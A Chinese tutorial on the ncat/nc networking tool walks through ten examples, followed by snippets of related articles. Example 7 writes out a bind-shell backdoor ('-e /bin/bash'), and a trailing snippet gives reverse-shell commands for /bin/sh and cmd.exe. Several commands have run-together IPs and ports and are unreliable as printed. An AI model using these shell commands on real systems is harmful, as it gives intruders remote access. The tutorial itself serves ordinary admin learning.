ncat

ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读、写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠的后端工具。同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。

ncat/nc 既是一个端口扫描工具,也是一款安全工具,还能是一款监测工具,甚至可以做为一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。

在大多数 Debian 发行版中,nc 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中,nc 并不会默认被安装。 你需要用下列命令手工安装。

  1. [[email protected] ~]#yum install nmap-ncat -y

系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。 管理员还能用它作为客户端来审计 Web 服务器、telnet 服务器、邮件服务器等, 通过 nc 我们可以控制发送的每个字符,也可以查看对方的回应。

我们还可以用它捕获客户端发送的数据以此来了解这些客户端是做什么的。

在本文中,我们会通过 10 个例子来学习如何使用 nc 命令。

例子: 1) 监听入站连接

通过 -l 选项,ncat 可以进入监听模式,使我们可以在指定端口监听入站连接。 完整的命令是这样的:

  1. $ ncat -l port_number

比如,

  1. $ ncat -l 8080

服务器就会开始在 8080 端口监听入站连接。

例子: 2) 连接远程系统

使用下面命令可以用 nc 来连接远程系统,

  1. $ ncat IP_address port_number

让我们来看个例子,

  1. $ ncat 192.168.1.10080

这会创建一个连接,连接到 IP 为 192.168.1.100 的服务器上的 80 端口,然后我们就可以向服务器发送指令了。 比如我们可以输入下面内容来获取完整的网页内容

  1. GET / HTTP/1.1

或者获取页面名称,

  1. GET / HTTP/1.1

或者我们可以通过以下方式获得操作系统指纹标识,

  1. HEAD / HTTP/1.1

这会告诉我们使用的是什么软件来运行这个 web 服务器的。

例子: 3) 连接 UDP 端口

默认情况下,nc 创建连接时只会连接 TCP 端口。 不过我们可以使用 -u 选项来连接到 UDP 端口,

  1. $ ncat -l -u 1234

现在我们的系统会开始监听 UDP 的 1234 端口,我们可以使用下面的 netstat 命令来验证这一点,

  1. $ netstat-tunlp |grep1234
  2. udp 000.0.0.0:12340.0.0.0:*17341/nc
  3. udp6 00:::1234:::*17341/nc

假设我们想发送或者说测试某个远程主机 UDP 端口的连通性,我们可以使用下面命令,

  1. $ ncat -v -u {host-ip}{udp-port}

比如:

  1. [[email protected] ~]# ncat -v -u 192.168.105.15053
  2. Ncat:Version6.40( http://nmap.org/ncat )
  3. Ncat:Connected to 192.168.105.150:53。

例子: 4) 将 nc 作为聊天工具

nc 也可以作为聊天工具来用,我们可以配置服务器监听某个端口,然后从远程主机上连接到服务器的这个端口,就可以开始发送消息了。 在服务器这端运行:

  1. $ ncat -l 8080

在远程客户端主机上运行:

  1. $ ncat 192.168.1.1008080

之后开始发送消息,这些消息会在服务器终端上显示出来。

例子: 5) 将 nc 作为代理

nc 也可以用来做代理。比如下面这个例子,

  1. $ ncat -l 8080| ncat 192.168.1.20080

所有发往我们服务器 8080 端口的连接都会自动转发到 192.168.1.200 上的 80 端口。 不过由于我们使用了管道,数据只能被单向传输。 要同时能够接受返回的数据,我们需要创建一个双向管道。 使用下面命令可以做到这点:

  1. $ mkfifo2way
  2. $ ncat -l 80800<2way| ncat 192.168.1.200801>2way

现在你可以通过 nc 代理来收发数据了。

例子: 6) 使用 nc 拷贝文件

nc 还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了 ssh/scp。 不过如果你恰好遇见个没有 ssh/scp 的系统的话, 你可以用 nc 来作最后的努力。

在要接受数据的机器上启动 nc 并让它进入监听模式:

  1. $ ncat -l 8080>file.txt

现在去要被拷贝数据的机器上运行下面命令:

  1. $ ncat 192.168.1.1008080--send-only < data.txt

这里,data.txt 是要发送的文件。 -–send-only 选项会在文件拷贝完后立即关闭连接。 如果不加该选项, 我们需要手工按下 ctrl+c 来关闭连接。

我们也可以用这种方法拷贝整个磁盘分区,不过请一定要小心。

例子: 7) 通过 nc 创建后门

nc 命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为:

  1. $ ncat -l 10000-e /bin/bash

-e 标志将一个 bash 与端口 10000 相连。现在客户端只要连接到服务器上的 10000 端口就能通过 bash 获取我们系统的完整访问权限:

  1. $ ncat 192.168.1.10010000

例子: 8) 通过 nc 进行端口转发

我们通过选项 -c 来用 nc 进行端口转发,实现端口转发的语法为:

  1. $ ncat -u -l 80-c ‘ncat -u -l 8080‘

这样,所有连接到 80 端口的连接都会转发到 8080 端口。

例子: 9) 设置连接超时

nc 的监听模式会一直运行,直到手工终止。 不过我们可以通过选项 -w 设置超时时间:

  1. $ ncat -w10192.168.1.1008080

这回导致连接 10 秒后终止,不过这个选项只能用于客户端而不是服务端。

例子: 10) 使用 -k 选项强制 nc 待命

当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项 -k 我们可以强制服务器保持连接并继续监听端口。 命令如下:

  1. $ ncat -l -k 8080

现在即使来自客户端的连接断了也依然会处于待命状态。

原文地址:https://www.cnblogs.com/huxl1/p/9097350.html

时间: 2024-11-02 02:22:20

ncat的相关文章

ncat的使用

由于netcat的缺陷,所以有了升级版ncat,弥补了netcat的一些不足. ncat是nmap工具包的一个工具. 服务器端 ncat -c bash --allow 192.168.1.119 -vnl 333 --ssl --allow 192.168.1.119只允许192.168.1.119这个IP进行连接. -vnl 开放的端口是333 .--ssl 启用ssl加密. 客户端 ncat -nv 192.168.1.115 333 --ssl

Ncat 反弹 Shell

ncat -l -n -v -p 9999 ncat -e /bin/sh 127.0.0.1 9999 ncat -e C:\Windows\system32\cmd.exe 127.0.0.1 9999 原文地址:https://www.cnblogs.com/forsaken/p/8582793.html

一文让你熟练掌握Linux的ncat(nc)命令

一文让你熟练掌握Linux的ncat(nc)命令 ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的.它是一款拥有多种功能的 CLI 工具,可以用来在网络上读.写以及重定向数据. 它被设计成可以被脚本或其他程序调用的可靠的后端工具.同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具. ncat/nc 既是一个端口扫描工具,也是一款安全工具,还是一款监测工具,甚至可以做为一个简单的 TCP 代理. 由于有这么多的功能,它被誉为是网络界的瑞士军刀. 这是每个系统管理

7-zip的标准输入输出(STDIN,STDOUT)与Ncat的配合使用,压缩后传输文件

Netcat/Ncat是很好用的网络工具,使用方法网上已经有很多文章讲解了,不再赘述.本文讲述用7-zip配合Ncat,实现从A机器到B机器的文件压缩传输.也就是说,准备发送的文件先在A机器上压缩,再把压缩之后的数据传送到B机器,在B机器实时解压缩,整个的传输过程对用户来说是透明的.因为流量减小了,网传速度可能得以加快.之所以说"可能",是因为压缩后传输速度是否得以加快,取决于CPU速度与网络速度之比.如果CPU慢而网速快,那还不如不压缩.如果出现这种情况,就当本文是一片纯技术探讨文把

shell 命名管道,进程间通信, ncat作http server

命名管道基础 命名管道也被称为FIFO文件, 在文件系统中是可见的,并且跟其它文件一样可以读写! 命名管道特点: 当写进程向管道中写数据的时候,如果没有进程读取这些数据,写进程会堵塞 当读取管道中的数据的时候,如果没有数据,读取进程会被堵塞 当写进程堵塞的时候,有读进程读取数据,那么写进程恢复正常 当读进程堵塞的时候,如果写进程写了数据,那么读进程会读取数据,然后正常执行后面的代码 # 写进程堵塞的情况 [[email protected]_10.2.1.242 test]$ echo 1 >p

linux ncat命令

netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了.你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端. 下面是一些使用netcat的例子. [A(172.31.100.7) B(172.31.100.23)] Linux netcat

ncat使用总结

功能 1. 监听本地端口 2. 连接目标端口 3. 传送文件 4. Remote Administration with Netcat(OSCP中给的分类,不知道此分类的作用,需要深入学习) 5. 反弹shell 6. 测两台机器间的网速 监听本地端口 # 临时监听端口 nc -l <PORT> # 临时监听TCP端口一次 nc -lu <PORT> # 临时监听UDP端口 # 以监听TCP端口为例,监听UDP端口基本一样 服务器端临时 监听端口客户端尝试连接服务器端建立TCP连接

Linux下常用的系统性能查看分析工具

Linux中,很多很全面显示系统当前运行状态,负载,I/O等信息的工具,帮助管理员实时了解系统运行动态,以及排除故障. ps命令:显示进程状态,快照方式显示. 进程分为两类:一类是用户通过终端启动的进程,一类是与终端无关的进程,多为守护进程. ps命令支持两种风格的命令:SysV风格 BDS风格.带横线的是SysV风格. ps命令选项:     a  :与终端有关的进程     x  : 与终端无关的进程     u  : 显示是哪个用户启动的       -e : 显示所有进程     -f 

网络安全扫描--基础篇

前言 1.了解互联网安全领域中日趋重要的扫描技术 2.了解在不同网络场景下扫描技术手段 3.熟悉linux下系统内核防护策略并能大件一个有效的系统防护体系 4.增强工作安全意识,并能有效的实践于工作场景中 目录 1.熟悉主机扫描工具(fping,hping)安装和使用 2.熟悉路由扫描工具(traceroute,mtr)使用 3.熟悉批量服务扫描工具(nmap,ncat)使用 4.熟悉如何通过linux内核预防恶意的扫描或者syn攻击 主机扫描 fping工具 作用: 批量的给目标发送ping要